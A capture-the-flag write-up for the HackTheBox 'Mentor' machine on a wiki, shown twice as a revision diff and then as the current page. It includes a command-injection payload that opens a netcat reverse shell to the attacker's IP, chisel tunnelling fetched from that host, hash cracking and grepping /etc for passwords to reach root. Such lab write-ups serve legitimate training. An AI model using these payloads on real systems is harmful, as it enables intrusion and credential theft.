Mentor: Difference between revisions

From RCATs
(Created page with "Category:HackTheBox Start with nmap scan with default scripts a version enumeration <source lang="bash">Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-10 07:45 MST Nmap scan report for 10.129.85.230 Host is up (0.085s latency)....")
 
No edit summary
Line 2: Line 2:
Start with nmap scan with default scripts a version enumeration
Start with nmap scan with default scripts a version enumeration


<source lang="bash">Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-10 07:45 MST
<syntaxhighlight lang="bash">Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-10 07:45 MST
Nmap scan report for 10.129.85.230                                                                                                                             
Nmap scan report for 10.129.85.230                                                                                                                             
Host is up (0.085s latency).                                                                                                                                   
Host is up (0.085s latency).                                                                                                                                   
Line 17: Line 17:


Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .                                                                 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .                                                                 
Nmap done: 1 IP address (1 host up) scanned in 27.41 seconds      </source>
Nmap done: 1 IP address (1 host up) scanned in 27.41 seconds      </syntaxhighlight>
Main webpage does not have much to look at. Lets scan subdomains. Vhost/subdomain scan gets us <code>api.mentorquotes.htb</code> Scan see if we get anything else <code>api.mentorquotes.htb</code>
Main webpage does not have much to look at. Lets scan subdomains. Vhost/subdomain scan gets us <code>api.mentorquotes.htb</code> Scan see if we get anything else <code>api.mentorquotes.htb</code>


<source lang="bash"> :: Method          : GET                                                                                            │
<syntaxhighlight lang="bash"> :: Method          : GET                                                                                            │
  :: URL              : http://api.mentorquotes.htb/FUZZ                                                                │
  :: URL              : http://api.mentorquotes.htb/FUZZ                                                                │
  :: Wordlist        : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt                    │
  :: Wordlist        : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt                    │
Line 35: Line 35:
quotes                  [Status: 307, Size: 0, Words: 1, Lines: 1, Duration: 84ms]                                    │
quotes                  [Status: 307, Size: 0, Words: 1, Lines: 1, Duration: 84ms]                                    │
server-status          [Status: 403, Size: 285, Words: 20, Lines: 10, Duration: 60ms]                                │
server-status          [Status: 403, Size: 285, Words: 20, Lines: 10, Duration: 60ms]                                │
:: Progress: [30000/30000] :: Job [1/1] :: 387 req/sec :: Duration: [0:01:18] :: Errors: 2 ::  </source>
:: Progress: [30000/30000] :: Job [1/1] :: 387 req/sec :: Duration: [0:01:18] :: Errors: 2 ::  </syntaxhighlight>
We get a <code>Status 200</code> from docs lets check that out. We see a potenial user <code>James</code> We also see various GET, POST, PUT, DELETE options. Try to create user. WORKS!
We get a <code>Status 200</code> from docs lets check that out. We see a potenial user <code>James</code> We also see various GET, POST, PUT, DELETE options. Try to create user. WORKS!


<source lang="bash">{
<syntaxhighlight lang="bash">{
   "email": "sour@sourmilk.com",
   "email": "sour@sourmilk.com",
   "username": "sourmilk",
   "username": "sourmilk",
Line 50: Line 50:
   "username": "sourmilk"
   "username": "sourmilk"
}
}
</source>
</syntaxhighlight>
Create james account since we know he is an admin.
Create james account since we know he is an admin.


<source lang="bash">{
<syntaxhighlight lang="bash">{
   "email": "james@sourmilk.com",
   "email": "james@sourmilk.com",
   "username": "james",
   "username": "james",
Line 65: Line 65:
   "email": "james@sourmilk.com",
   "email": "james@sourmilk.com",
   "username": "james"
   "username": "james"
}</source>
}</syntaxhighlight>
<code>/auth/login</code> to get a token
<code>/auth/login</code> to get a token


<source lang="bash">{
<syntaxhighlight lang="bash">{
   "email": "james@sourmilk.com",
   "email": "james@sourmilk.com",
   "username": "james",
   "username": "james",
Line 74: Line 74:
}
}
# response
# response
"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0Bzb3VybWlsay5jb20ifQ.bJvjQmy6Y4g28RLiXnyGpXrpPKwg0m52j11q7j8-VjY"</source>
"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0Bzb3VybWlsay5jb20ifQ.bJvjQmy6Y4g28RLiXnyGpXrpPKwg0m52j11q7j8-VjY"</syntaxhighlight>
curl <code>/admin</code> with token to get a response.
curl <code>/admin</code> with token to get a response.


<source lang="bash">curl -H "Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0Bzb3VybWlsay5jb20ifQ.bJvjQmy6Y4g28RLiXnyGpXrpPKwg0m52j11q7j8-VjY" http://api.mentorquotes.htb/admin/
<syntaxhighlight lang="bash">curl -H "Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0Bzb3VybWlsay5jb20ifQ.bJvjQmy6Y4g28RLiXnyGpXrpPKwg0m52j11q7j8-VjY" http://api.mentorquotes.htb/admin/


# Response
# Response
{"admin_funcs":{"check db connection":"/check","backup the application":"/backup"}}</source>
{"admin_funcs":{"check db connection":"/check","backup the application":"/backup"}}</syntaxhighlight>
check <code>/admin/check</code>
check <code>/admin/check</code>


<source lang="bash">curl -H "Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0Bzb3VybWlsay5jb20ifQ.bJvjQmy6Y4g28RLiXnyGpXrpPKwg0m52j11q7j8-VjY" http://api.mentorquotes.htb/admin/check
<syntaxhighlight lang="bash">curl -H "Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0Bzb3VybWlsay5jb20ifQ.bJvjQmy6Y4g28RLiXnyGpXrpPKwg0m52j11q7j8-VjY" http://api.mentorquotes.htb/admin/check


# Reponse
# Reponse
{"details":"Not implemented yet!"}
{"details":"Not implemented yet!"}
</source>
</syntaxhighlight>
Check <code>/admin/backup/</code>
Check <code>/admin/backup/</code>


<source lang="bash">curl -H "Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0Bzb3VybWlsay5jb20ifQ.bJvjQmy6Y4g28RLiXnyGpXrpPKwg0m52j11q7j8-VjY" http://api.mentorquotes.htb/admin/backup
<syntaxhighlight lang="bash">curl -H "Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0Bzb3VybWlsay5jb20ifQ.bJvjQmy6Y4g28RLiXnyGpXrpPKwg0m52j11q7j8-VjY" http://api.mentorquotes.htb/admin/backup


# Response
# Response
{"detail":"Method Not Allowed"}
{"detail":"Method Not Allowed"}
{"detail":[{"loc":["body"],"msg":"field required","type":"value_error.missing"}]}</source>
{"detail":[{"loc":["body"],"msg":"field required","type":"value_error.missing"}]}</syntaxhighlight>
Make a test payload to see if we can do anything. Works!
Make a test payload to see if we can do anything. Works!


<source lang="bash">curl -H "Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0Bzb3VybWlsay5jb20ifQ.bJvjQmy6Y4g28RLiXnyGpXrpPKwg0m52j11q7j8-VjY" http://api.mentorquotes.htb/admin/backup -H "content-type: application/json" -d '{"body":"test","path":"test `wget http://10.10.16.11`"}'</source>
<syntaxhighlight lang="bash">curl -H "Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0Bzb3VybWlsay5jb20ifQ.bJvjQmy6Y4g28RLiXnyGpXrpPKwg0m52j11q7j8-VjY" http://api.mentorquotes.htb/admin/backup -H "content-type: application/json" -d '{"body":"test","path":"test `wget http://10.10.16.11`"}'</syntaxhighlight>
Reverse Shell
Reverse Shell


<source lang="bash">curl -H "Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0Bzb3VybWlsay5jb20ifQ.bJvjQmy6Y4g28RLiXnyGpXrpPKwg0m52j11q7j8-VjY" http://api.mentorquotes.htb/admin/backup -H "content-type: application/json" -d '{"body":"test","path":"test `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.16.11 4444 >/tmp/f`"}'</source>
<syntaxhighlight lang="bash">curl -H "Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0Bzb3VybWlsay5jb20ifQ.bJvjQmy6Y4g28RLiXnyGpXrpPKwg0m52j11q7j8-VjY" http://api.mentorquotes.htb/admin/backup -H "content-type: application/json" -d '{"body":"test","path":"test `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.16.11 4444 >/tmp/f`"}'</syntaxhighlight>
Dig around the docker you are in.
Dig around the docker you are in.


<source lang="bash">/app # ls
<syntaxhighlight lang="bash">/app # ls
Dockerfile
Dockerfile
app
app
Line 126: Line 126:
-rw-r--r--    1 root    root          1001 Jun  7  2022 db.py
-rw-r--r--    1 root    root          1001 Jun  7  2022 db.py
-rw-r--r--    1 root    root          1149 Jun  4  2022 main.py
-rw-r--r--    1 root    root          1149 Jun  4  2022 main.py
-rw-r--r--    1 root    root          704 Jun  4  2022 requirements.txt</source>
-rw-r--r--    1 root    root          704 Jun  4  2022 requirements.txt</syntaxhighlight>
cat db.py
cat db.py


<source lang="python">import os
<syntaxhighlight lang="python">import os


from sqlalchemy import (Column, DateTime, Integer, String, Table, create_engine, MetaData)
from sqlalchemy import (Column, DateTime, Integer, String, Table, create_engine, MetaData)
Line 164: Line 164:


# Databases query builder
# Databases query builder
database = Database(DATABASE_URL)</source>
database = Database(DATABASE_URL)</syntaxhighlight>
[https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding Hacktricks Port Fowarding] [https://dev.to/jmau111/getting-started-with-chisel-in-ctfs-o76 Good read about chisel]
[https://book.hacktricks.xyz/generic-methodologies-and-resyntaxhighlights/tunneling-and-port-forwarding Hacktricks Port Fowarding] [https://dev.to/jmau111/getting-started-with-chisel-in-ctfs-o76 Good read about chisel]


<source lang="bash"># My machine
<syntaxhighlight lang="bash"># My machine
./chisel server -p 4443 --reverse
./chisel server -p 4443 --reverse


Line 173: Line 173:
wget http://10.10.16.11/chisel
wget http://10.10.16.11/chisel
chmod +x chisel
chmod +x chisel
./chisel client -v 10.10.16.11:4443 R:5432:172.22.0.1:5432</source>
./chisel client -v 10.10.16.11:4443 R:5432:172.22.0.1:5432</syntaxhighlight>
Now we can try to log into the bd we found
Now we can try to log into the bd we found


<source lang="bash">psql -h 127.0.0.1 -U "postgres" -p 5432
<syntaxhighlight lang="bash">psql -h 127.0.0.1 -U "postgres" -p 5432
Password for user postgres:
Password for user postgres:
psql (14.5 (Debian 14.5-2), server 13.7 (Debian 13.7-1.pgdg110+1))
psql (14.5 (Debian 14.5-2), server 13.7 (Debian 13.7-1.pgdg110+1))
Line 213: Line 213:
   2 | svc@mentorquotes.htb    | service_acc | --------------------------
   2 | svc@mentorquotes.htb    | service_acc | --------------------------
   4 | james@sourmilk.com      | james      | -------------------
   4 | james@sourmilk.com      | james      | -------------------
(3 rows)</source>
(3 rows)</syntaxhighlight>
Grab svc hash and crackstaion has a hit!
Grab svc hash and crackstaion has a hit!


<source lang="bash">123meuno***********</source>
<syntaxhighlight lang="bash">123meuno***********</syntaxhighlight>
SSH into box
SSH into box


<source lang="bash">❯ ssh svc@mentorquotes.htb
<syntaxhighlight lang="bash">❯ ssh svc@mentorquotes.htb
svc@mentorquotes.htb's password:
svc@mentorquotes.htb's password:
Welcome to Ubuntu 22.04.1 LTS (GNU/Linux 5.15.0-56-generic x86_64)
Welcome to Ubuntu 22.04.1 LTS (GNU/Linux 5.15.0-56-generic x86_64)
Line 254: Line 254:


Last login: Mon Dec 12 17:10:51 2022 from 10.10.16.11
Last login: Mon Dec 12 17:10:51 2022 from 10.10.16.11
svc@mentor:~$</source>
svc@mentor:~$</syntaxhighlight>
Search for passwords in config files. <code>grep -iR password /etc 2&gt;/dev/null | grep &quot;.conf&quot;</code>
Search for passwords in config files. <code>grep -iR password /etc 2&gt;/dev/null | grep &quot;.conf&quot;</code>


<source lang="bash">svc@mentor:/tmp$ grep -iR password /etc 2>/dev/null | grep ".conf"
<syntaxhighlight lang="bash">svc@mentor:/tmp$ grep -iR password /etc 2>/dev/null | grep ".conf"
/etc/hdparm.conf:# --security-set-pass Set security password
/etc/hdparm.conf:# --security-set-pass Set security password
/etc/hdparm.conf:# security_pass = password
/etc/hdparm.conf:# security_pass = password
Line 306: Line 306:
/etc/sudo.conf:# password prompt for "sudo -A" support.  Sudo does not ship with its
/etc/sudo.conf:# password prompt for "sudo -A" support.  Sudo does not ship with its
/etc/apparmor.d/abstractions/authentication:  # databases containing passwords, PAM configuration files, PAM libraries
/etc/apparmor.d/abstractions/authentication:  # databases containing passwords, PAM configuration files, PAM libraries
</source>
</syntaxhighlight>
Winner Winner
Winner Winner


<source lang="bash">/etc/snmp/snmpd.conf:createUser bootstrap MD5 SuperSecurePassword123__ DES</source>
<syntaxhighlight lang="bash">/etc/snmp/snmpd.conf:createUser bootstrap MD5 SuperSecurePassword123__ DES</syntaxhighlight>
Super user james and get your flag!
Super user james and get your flag!


<source lang="bash">james@mentor:/tmp$ su james
<syntaxhighlight lang="bash">james@mentor:/tmp$ su james
Password:
Password:
james@mentor:/tmp$ sudo /bin/sh
james@mentor:/tmp$ sudo /bin/sh
Line 321: Line 321:
# ls
# ls
logins.log  root.txt  scripts  snap
logins.log  root.txt  scripts  snap
# cat root.txt</source>
# cat root.txt</syntaxhighlight>

Revision as of 17:29, 20 January 2023

Start with nmap scan with default scripts a version enumeration

Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-10 07:45 MST
Nmap scan report for 10.129.85.230                                                                                                                             
Host is up (0.085s latency).                                                                                                                                   
Not shown: 998 closed tcp ports (conn-refused)                                                                                                                 
PORT   STATE SERVICE VERSION                                                                                                                                   
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)                                                                                       
| ssh-hostkey:                                                                                                                                                 
|   256 c73bfc3cf9ceee8b4818d5d1af8ec2bb (ECDSA)                                                                                                               
|_  256 4440084c0ecbd4f18e7eeda85c68a4f7 (ED25519)                                                                                                             
80/tcp open  http    Apache httpd 2.4.52                                                                                                                       
|_http-title: Did not follow redirect to http://mentorquotes.htb/                                                                                              
|_http-server-header: Apache/2.4.52 (Ubuntu)                                                                                                                   
Service Info: Host: mentorquotes.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel                                                                                

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .                                                                 
Nmap done: 1 IP address (1 host up) scanned in 27.41 seconds

Main webpage does not have much to look at. Lets scan subdomains. Vhost/subdomain scan gets us api.mentorquotes.htb Scan see if we get anything else api.mentorquotes.htb

 :: Method           : GET                                                                                             │
 :: URL              : http://api.mentorquotes.htb/FUZZ                                                                │
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt                     │
 :: Follow redirects : false                                                                                           │
 :: Calibration      : false                                                                                           │
 :: Timeout          : 10                                                                                              │
 :: Threads          : 40                                                                                              │
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500                                            │
________________________________________________                                                                       │
                                                                                                                       │
admin                   [Status: 307, Size: 0, Words: 1, Lines: 1, Duration: 98ms]                                     │
docs                    [Status: 200, Size: 969, Words: 194, Lines: 31, Duration: 71ms]                                │
users                   [Status: 307, Size: 0, Words: 1, Lines: 1, Duration: 79ms]                                     │
quotes                  [Status: 307, Size: 0, Words: 1, Lines: 1, Duration: 84ms]                                     │
server-status           [Status: 403, Size: 285, Words: 20, Lines: 10, Duration: 60ms]                                 │
:: Progress: [30000/30000] :: Job [1/1] :: 387 req/sec :: Duration: [0:01:18] :: Errors: 2 ::

We get a Status 200 from docs lets check that out. We see a potenial user James We also see various GET, POST, PUT, DELETE options. Try to create user. WORKS!

{
  "email": "sour@sourmilk.com",
  "username": "sourmilk",
  "password": "password123456"
}
# Response

{
  "id": 5,
  "email": "sour@sourmilk.com",
  "username": "sourmilk"
}

Create james account since we know he is an admin.

{
  "email": "james@sourmilk.com",
  "username": "james",
  "password": "password123456"
}

# Response

{
  "id": 6,
  "email": "james@sourmilk.com",
  "username": "james"
}

/auth/login to get a token

{
  "email": "james@sourmilk.com",
  "username": "james",
  "password": "password123456"
}
# response
"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0Bzb3VybWlsay5jb20ifQ.bJvjQmy6Y4g28RLiXnyGpXrpPKwg0m52j11q7j8-VjY"

curl /admin with token to get a response.

curl -H "Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0Bzb3VybWlsay5jb20ifQ.bJvjQmy6Y4g28RLiXnyGpXrpPKwg0m52j11q7j8-VjY" http://api.mentorquotes.htb/admin/

# Response
{"admin_funcs":{"check db connection":"/check","backup the application":"/backup"}}

check /admin/check

curl -H "Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0Bzb3VybWlsay5jb20ifQ.bJvjQmy6Y4g28RLiXnyGpXrpPKwg0m52j11q7j8-VjY" http://api.mentorquotes.htb/admin/check

# Reponse
{"details":"Not implemented yet!"}

Check /admin/backup/

curl -H "Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0Bzb3VybWlsay5jb20ifQ.bJvjQmy6Y4g28RLiXnyGpXrpPKwg0m52j11q7j8-VjY" http://api.mentorquotes.htb/admin/backup

# Response
{"detail":"Method Not Allowed"}
{"detail":[{"loc":["body"],"msg":"field required","type":"value_error.missing"}]}

Make a test payload to see if we can do anything. Works!

curl -H "Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0Bzb3VybWlsay5jb20ifQ.bJvjQmy6Y4g28RLiXnyGpXrpPKwg0m52j11q7j8-VjY" http://api.mentorquotes.htb/admin/backup -H "content-type: application/json" -d '{"body":"test","path":"test `wget http://10.10.16.11`"}'

Reverse Shell

curl -H "Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0Bzb3VybWlsay5jb20ifQ.bJvjQmy6Y4g28RLiXnyGpXrpPKwg0m52j11q7j8-VjY" http://api.mentorquotes.htb/admin/backup -H "content-type: application/json" -d '{"body":"test","path":"test `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.16.11 4444 >/tmp/f`"}'

Dig around the docker you are in.

/app # ls
Dockerfile
app
requirements.txt
/app # ls -al
total 32
drwxr-xr-x    1 root     root          4096 Nov 10 16:00 .
drwxr-xr-x    1 root     root          4096 Nov 10 16:00 ..
-rw-r--r--    1 root     root          1024 Jun 12 10:21 .Dockerfile.swp
-rw-r--r--    1 root     root           522 Nov  3 12:58 Dockerfile
drwxr-xr-x    1 root     root          4096 Nov 10 16:00 app
-rw-r--r--    1 root     root           672 Jun  4  2022 requirements.txt
/app # cd app
/app/app # ls -al
total 40
drwxr-xr-x    1 root     root          4096 Nov 10 16:00 .
drwxr-xr-x    1 root     root          4096 Nov 10 16:00 ..
-rw-r--r--    1 root     root             0 Jun  4  2022 __init__.py
drwxr-xr-x    1 root     root          4096 Nov 10 16:00 __pycache__
drwxr-xr-x    1 root     root          4096 Nov 10 16:00 api
-rw-r--r--    1 root     root             0 Jun  4  2022 config.py
-rw-r--r--    1 root     root          1001 Jun  7  2022 db.py
-rw-r--r--    1 root     root          1149 Jun  4  2022 main.py
-rw-r--r--    1 root     root           704 Jun  4  2022 requirements.txt

cat db.py

import os

from sqlalchemy import (Column, DateTime, Integer, String, Table, create_engine, MetaData)
from sqlalchemy.sql import func
from databases import Database

# Database url if none is passed the default one is used
DATABASE_URL = os.getenv("DATABASE_URL", "postgresql://postgres:postgres@172.22.0.1/mentorquotes_db")

# SQLAlchemy for quotes
engine = create_engine(DATABASE_URL)
metadata = MetaData()
quotes = Table(
    "quotes",
    metadata,
    Column("id", Integer, primary_key=True),
    Column("title", String(50)),
    Column("description", String(50)),
    Column("created_date", DateTime, default=func.now(), nullable=False)
)

# SQLAlchemy for users
engine = create_engine(DATABASE_URL)
metadata = MetaData()
users = Table(
    "users",
    metadata,
    Column("id", Integer, primary_key=True),
    Column("email", String(50)),
    Column("username", String(50)),
    Column("password", String(128) ,nullable=False)
)


# Databases query builder
database = Database(DATABASE_URL)

Hacktricks Port Fowarding Good read about chisel

# My machine
./chisel server -p 4443 --reverse

# Victim machine
wget http://10.10.16.11/chisel
chmod +x chisel
./chisel client -v 10.10.16.11:4443 R:5432:172.22.0.1:5432

Now we can try to log into the bd we found

psql -h 127.0.0.1 -U "postgres" -p 5432
Password for user postgres:
psql (14.5 (Debian 14.5-2), server 13.7 (Debian 13.7-1.pgdg110+1))
Type "help" for help.

postgres=# \list
                                    List of databases
      Name       |  Owner   | Encoding |  Collate   |   Ctype    |   Access privileges   
-----------------+----------+----------+------------+------------+-----------------------
 mentorquotes_db | postgres | UTF8     | en_US.utf8 | en_US.utf8 |
 postgres        | postgres | UTF8     | en_US.utf8 | en_US.utf8 |
 template0       | postgres | UTF8     | en_US.utf8 | en_US.utf8 | =c/postgres          +
                 |          |          |            |            | postgres=CTc/postgres
 template1       | postgres | UTF8     | en_US.utf8 | en_US.utf8 | =c/postgres          +
                 |          |          |            |            | postgres=CTc/postgres
(4 rows)

postgres=# \c mentorquotes_db
psql (14.5 (Debian 14.5-2), server 13.7 (Debian 13.7-1.pgdg110+1))
You are now connected to database "mentorquotes_db" as user "postgres".
mentorquotes_db=# \d
              List of relations
 Schema |     Name      |   Type   |  Owner   
--------+---------------+----------+----------
 public | cmd_exec      | table    | postgres
 public | quotes        | table    | postgres
 public | quotes_id_seq | sequence | postgres
 public | users         | table    | postgres
 public | users_id_seq  | sequence | postgres
(5 rows)

mentorquotes_db=# select * from users;
 id |          email          |  username   |             password             
----+-------------------------+-------------+----------------------------------
  1 | james@mentorquotes.htb  | james       | -----------------------------
  2 | svc@mentorquotes.htb    | service_acc | --------------------------
  4 | james@sourmilk.com      | james       | -------------------
(3 rows)

Grab svc hash and crackstaion has a hit!

123meuno***********

SSH into box

❯ ssh svc@mentorquotes.htb
svc@mentorquotes.htb's password:
Welcome to Ubuntu 22.04.1 LTS (GNU/Linux 5.15.0-56-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon Dec 12 05:21:51 PM UTC 2022

  System load:                      0.08740234375
  Usage of /:                       64.9% of 8.09GB
  Memory usage:                     14%
  Swap usage:                       0%
  Processes:                        237
  Users logged in:                  0
  IPv4 address for br-028c7a43f929: 172.20.0.1
  IPv4 address for br-24ddaa1f3b47: 172.19.0.1
  IPv4 address for br-3d63c18e314d: 172.21.0.1
  IPv4 address for br-7d5c72654da7: 172.22.0.1
  IPv4 address for br-a8a89c3bf6ff: 172.18.0.1
  IPv4 address for docker0:         172.17.0.1
  IPv4 address for eth0:            10.129.85.242
  IPv6 address for eth0:            dead:beef::250:56ff:feb9:4e9f


0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Mon Dec 12 17:10:51 2022 from 10.10.16.11
svc@mentor:~$

Search for passwords in config files. grep -iR password /etc 2>/dev/null | grep ".conf"

svc@mentor:/tmp$ grep -iR password /etc 2>/dev/null | grep ".conf"
/etc/hdparm.conf:# --security-set-pass Set security password
/etc/hdparm.conf:# security_pass = password
/etc/hdparm.conf:# --user-master Select password to use
/etc/iscsi/iscsid.conf:# To set a CHAP username and password for initiator
/etc/iscsi/iscsid.conf:#node.session.auth.password = password
/etc/iscsi/iscsid.conf:# To set a CHAP username and password for target(s)
/etc/iscsi/iscsid.conf:#node.session.auth.password_in = password_in
/etc/iscsi/iscsid.conf:# To set a discovery session CHAP username and password for the initiator
/etc/iscsi/iscsid.conf:#discovery.sendtargets.auth.password = password
/etc/iscsi/iscsid.conf:# To set a discovery session CHAP username and password for target(s)
/etc/iscsi/iscsid.conf:#discovery.sendtargets.auth.password_in = password_in
/etc/ssh/ssh_config:#   PasswordAuthentication yes
/etc/ssh/sshd_config:#PermitRootLogin prohibit-password
/etc/ssh/sshd_config:# To disable tunneled clear text passwords, change to no here!
/etc/ssh/sshd_config:#PasswordAuthentication yes
/etc/ssh/sshd_config:#PermitEmptyPasswords no
/etc/ssh/sshd_config:# Change to yes to enable challenge-response passwords (beware issues with
/etc/ssh/sshd_config:# PasswordAuthentication.  Depending on your PAM configuration,
/etc/ssh/sshd_config:# the setting of "PermitRootLogin without-password".
/etc/ssh/sshd_config:# PAM authentication, then enable this but set PasswordAuthentication
/etc/ssh/sshd_config:PasswordAuthentication yes
/etc/apache2/sites-available/default-ssl.conf:          #        Note that no password is obtained from the user. Every entry in the user
/etc/apache2/sites-available/default-ssl.conf:          #        file needs this password: `xxj31ZMTZzkVA'.
/etc/sos/sos.conf:#password = true
/etc/debconf.conf:# World-readable, and accepts everything but passwords.
/etc/debconf.conf:Reject-Type: password
/etc/debconf.conf:# Not world readable (the default), and accepts only passwords.
/etc/debconf.conf:Name: passwords
/etc/debconf.conf:Accept-Type: password
/etc/debconf.conf:Filename: /var/cache/debconf/passwords.dat
/etc/debconf.conf:# databases, one to hold passwords and one for everything else.
/etc/debconf.conf:Stack: config, passwords
/etc/debconf.conf:# A remote LDAP database. It is also read-only. The password is really
/etc/snmp/snmpd.conf:createUser bootstrap MD5 SuperSecurePassword123__ DES
/etc/overlayroot.conf:#       if not provided or empty, password is randomly generated
/etc/overlayroot.conf:#       the generated password will be stored for recovery in
/etc/overlayroot.conf:#     crypt:dev=/dev/vdb,pass=somepassword,mkfs=0
/etc/overlayroot.conf:#      $ MAPNAME="secure"; DEV="/dev/vdg"; PASSWORD="foobar"
/etc/overlayroot.conf:#      $ printf "%s" "$PASSWORD" |
/etc/overlayroot.conf:#      $ printf "%s" "$PASSWORD" |
/etc/overlayroot.conf:#    IT IS INSECURE TO SET THIS PASSWORD HERE IN THIS CLEARTEXT CONFIGURATION
/etc/overlayroot.conf:#    Randomly generated passwords are more secure, but you won't be able to
/etc/overlayroot.conf:#    Randomly generated passwords are generated by calculating the sha512sum
/etc/fwupd/remotes.d/lvfs-testing.conf:#Password=
/etc/fwupd/redfish.conf:# The username and password to the Redfish service
/etc/fwupd/redfish.conf:#Password=
/etc/sudo.conf:# password prompt for "sudo -A" support.  Sudo does not ship with its
/etc/apparmor.d/abstractions/authentication:  # databases containing passwords, PAM configuration files, PAM libraries

Winner Winner

/etc/snmp/snmpd.conf:createUser bootstrap MD5 SuperSecurePassword123__ DES

Super user james and get your flag!

james@mentor:/tmp$ su james
Password:
james@mentor:/tmp$ sudo /bin/sh
[sudo] password for james:
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls
logins.log  root.txt  scripts  snap
# cat root.txt